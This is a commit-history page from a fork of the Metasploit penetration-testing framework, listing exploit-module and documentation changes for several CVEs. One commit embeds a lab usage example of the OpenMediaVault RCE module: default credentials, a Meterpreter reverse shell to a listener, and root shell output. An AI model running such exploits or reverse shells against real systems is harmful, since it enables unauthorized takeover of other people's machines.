adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
73,452 Commits 27 Branches 1,043 Tags
3da170a43c7f288fe9bc88fe325da488733acac3
Commit Graph

6278 Commits

Author SHA1 Message Date
spassino 913aee2a45 Modified zabbix login to work with newer versions of zabbix 
Added documentation for zabbix login
 2020-10-21 21:14:57 -04:00
h00die 5890bc45b5 move docs out of exploits folder 2020-10-21 16:37:02 -04:00
William Vu e4fb76d74f Add version check to exchange_ecp_dlp_policy 
And update modules/exploits/windows/http/sharepoint_ssi_viewstate.rb.
 2020-10-20 14:32:43 -05:00
William Vu 3970b69734 Land #14229, Telerik UI for ASP.NET AJAX exploit 
CVE-2017-11317 && CVE-2019-18935
 2020-10-20 13:24:35 -05:00
bwatters 1e568a6d1b Merge branch 'land-14179' into upstream-master 2020-10-19 15:55:25 -05:00
William Vu 253928570b Update module doc 2020-10-19 11:18:00 -05:00
Spencer McIntyre 0f344b0661 Land #14265, Add SharePoint Server-Side Include (SSI) and ViewState RCE (CVE-2020-16952) 2020-10-19 10:27:58 -04:00
adfoster-r7 76d5a4e444 Land #14258, add documentation and rubocop for several post/windows/gather modules 2020-10-19 12:59:06 +01:00
h00die bab5377290 docs are md not rb 2020-10-19 05:19:27 -04:00
h00die 5dcee8c8a9 add download ref 2020-10-18 11:20:06 -04:00
h00die f3a633b89e cve-2018-14847 2020-10-18 11:13:16 -04:00
Karn Ganeshen a71d0576db doc updated with new logs 2020-10-16 03:24:27 +05:30
William Vu 4cb08f7426 Address outstanding issues 2020-10-15 13:24:08 -05:00
Tim W 87104a7236 Update docs and make them msftidy_docs.rb compliant 2020-10-15 10:59:46 -05:00
Grant Willcox 59f74438da Rename the LPE exploit to a more appropriate name since their could be future bugs in NtUserMessageCall and also update the description info a bit more 2020-10-15 10:59:44 -05:00
Grant Willcox f2899186e4 Add in first round of initial updates to fix review comments 2020-10-15 10:59:40 -05:00
Tim W dcc322436b Update documentation files and module description to more accurately describe what the cause of the LPE bug for CVE-2019-1458 is. also apply RuboCop edits. 2020-10-15 10:58:58 -05:00
Tim W 00d209425b add documentation 2020-10-15 10:58:08 -05:00
Karn Ganeshen 2fed443179 Apache Zookeeper Info Disclosure Documentation 2020-10-15 17:32:12 +05:30
ide0x90 8d43fa4848 Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00
William Vu 1a341ae931 Add SharePoint SSI and ViewState RCE 
CVE-2020-16952
 2020-10-14 17:45:15 -05:00
Graeme Robinson f6b5053666 Add exploit/multi/http/kong_gateway_admin_api_rce 2020-10-13 16:56:34 +01:00
Pedro Ribeiro 9fe5e4d036 Create docs 2020-10-12 14:29:46 +07:00
h00die 39a623f3e0 docs for domain post modules 2020-10-11 18:53:28 -04:00
h00die f75367d8bd docs and rubocop 2020-10-11 17:44:21 -04:00
ide0x90 b9df68cbb6 Fix module according to Rubocop, make documentation follow standard. 2020-10-11 19:04:06 +08:00
ide0x90 57b0f30e37 Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00
stasinopoulos a3fac9619c Minor updates 2020-10-09 16:32:44 +03:00
youkergav 263b6bc070 Merge branch 'master' of github.com:rapid7/metasploit-framework into su_login 2020-10-09 05:26:48 -04:00
stasinopoulos ded297a756 Update openmediavault_rpc_rce.md 2020-10-09 12:13:22 +03:00
youkergav 23c6c415eb Added python alternative and check function 2020-10-09 03:58:55 -04:00
Grant Willcox a2e15235b8 Make fixes to documentation for smart_hashdump.md to fix msftidy issues and improve readability 2020-10-08 14:07:44 -05:00
0x44434241 73e826486f Adding some basic documentation, as it was missing for this module. 2020-10-08 12:58:31 +09:00
Spencer McIntyre fb569a24ee Add module documentation for Telerik RAU Deserialization 2020-10-07 13:40:10 -04:00
Ivanov Vladimir 32b489408e Update docs 2020-10-07 10:12:10 -05:00
Grant Willcox 5ad2190c40 Apply updates to the module from the review process and a minor update to the documentation to note the renaming of the PATH option to URIPATH. Also update the check method so that it now works correctly and so that other functions return errors appropriately. 2020-10-07 10:08:57 -05:00
Ivanov Vladimir cc721fd64f Update several functions to apply review edits and also update the documentation accordingly. 2020-10-07 10:07:48 -05:00
Ivanov Vladimir 24d14f8816 Rename URN to PATH in several functions. Also change check function. 2020-10-07 10:04:55 -05:00
Grant Willcox 8a8dfafcc3 Rename the files and update some descriptions as there may be more XXE bugs in SAP in the future. Also update the documentation accordingly. 2020-10-07 10:04:03 -05:00
Grant Willcox 14f4de1f0c Clean up documentation to improve English and descriptions, and to also remove some excess information that was leading to some potential confusion 2020-10-07 10:04:03 -05:00
Vladimir Ivanov 7c682af98b Create sap_igs_xxe.rb and its associated documentation, and apply RuboCop fixes. 2020-10-07 10:03:09 -05:00
stasinopoulos ca3a4cacb5 OpenMediaVault 5.5.11 Authenticated Remote Code Execution 
This module exploits an authenticated PHP code injection vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12  inclusive in the "sortfield" POST parameter of "rpc.php" page, because json_encode_safe is not used in config/databasebackend.inc. Successful exploitation allows arbitrary command execution on the underlying operating system as root.

### Usage Example
```
msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options

Module options (exploit/unix/webapp/openmediavault_rpc_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  openmediavault   yes       Password to login with
   HttpUsername  admin            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
rhosts => 192.168.56.108
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
lhost => 192.168.56.105
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.105:4444
[*] 192.168.56.108:80 - Authenticating using "admin:openmediavault" credentials...
[+] 192.168.56.108:80 - Authenticated successfully.
[+] 192.168.56.108:80 - OpenMediaVault version 5.5.11 identified.
[*] 192.168.56.108:80 - Sending payload (150 bytes)...
[*] Sending stage (976712 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : 192.168.56.108
OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 1499 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
```
 2020-10-07 09:59:45 +03:00
bwatters 3a6293357e Land #14190, Add the DOMAIN option to the CVE-2020-0688 Exploit 
Merge branch 'land-14190' into upstream-master
 2020-10-05 12:12:21 -05:00
h00die 15bb690308 fix vulnerability spelling 2020-10-04 13:00:48 -04:00
Grant Willcox f45d9b295a Land #14204, Update the module docs for CVE-2020-1472 (Zerologon) 2020-10-01 10:09:19 -05:00
bwatters e24a81919a Land #13996, Add module for CVE-2020-9801, CVE-2020-9850 and CVE-2020-9856, 
RCE for Safari on macOS 10.15.3 (pwn2own2020)

Merge branch 'land-13996' into upstream-master
 2020-10-01 09:46:39 -05:00
Spencer McIntyre bf13ffc692 Update documentation based on feedback 2020-10-01 09:19:15 -04:00
Spencer McIntyre 377c019d99 Update the module docs for CVE-2020-1472 2020-09-30 17:41:14 -04:00
Grant Willcox fb73be7e35 Land #14199, Fix SecureCRT missing registry key bug 2020-09-30 13:17:06 -05:00
Grant Willcox b0bad9fc85 Fix up small issue with one of the checks and update the documentation with the new SESSION_PATH option 2020-09-30 12:26:32 -05:00